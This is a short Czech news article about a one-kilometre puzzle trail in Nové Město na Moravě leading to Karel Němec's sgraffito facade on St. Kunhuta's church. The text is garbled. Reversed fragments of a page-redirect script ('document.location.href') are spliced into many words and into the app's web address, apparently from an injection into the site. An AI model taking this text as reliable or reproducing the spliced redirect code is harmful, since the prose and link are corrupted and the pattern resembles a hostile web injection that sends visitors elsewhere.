Rainbow page separator

Němcova šifra vede k unikátní fasádě novoměstského kostela

Pátek, 13. prosince 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Od rodného domu výtvarníka Karla Němce v novoměstské Žďárské ulici k radnici a následně ke kostelu svaté Kunhuty vede trasa s názvem Němcova šifra, po které se mohou pustit luštitelé tajného vzkazu zašifrovaného ve sgrafi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové výzdobě fasády kostela. Trasa je dlouhá kilometr, má dvanáct zastavení a zabere zhruba hodinu času, přičemž luštitelé poznají i další díla tvůrce výzdoby řady novoměstských staveb. Stačí si nainstalovat aplikaci prostřednictvím webového odkazu [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave-namesti-nemcova-sifra“ target=“_blank“ rel=“noopener“>www.skrytepribehy.cz/trasa/nove-mes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave-namesti-nemcova-sifra. Nová Němcova šifra je součástí celorepublikového projetu Skryté příběhy.
Karel Němec (1879 – 1960), významný český malíř a grafik a současně i novoměstský rodák svými pozoruhodnými sgrafity vyzdobil nejenom řadu novoměstských domů a dalších staveb, ale tvořil je i v okolních obcích. Nejrozsáhlejší je právě sgrafi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová výzdoba kostela svaté Kunhuty na novoměstském Vratislavově náměstí. Tamní radnice le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok vyhlásila Rokem Karla Němce, kdy se u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti 140. výročí narození umělce, jenž je v Novém Městě taktéž pochován, uskutečnila řada kulturně-společenských akcí.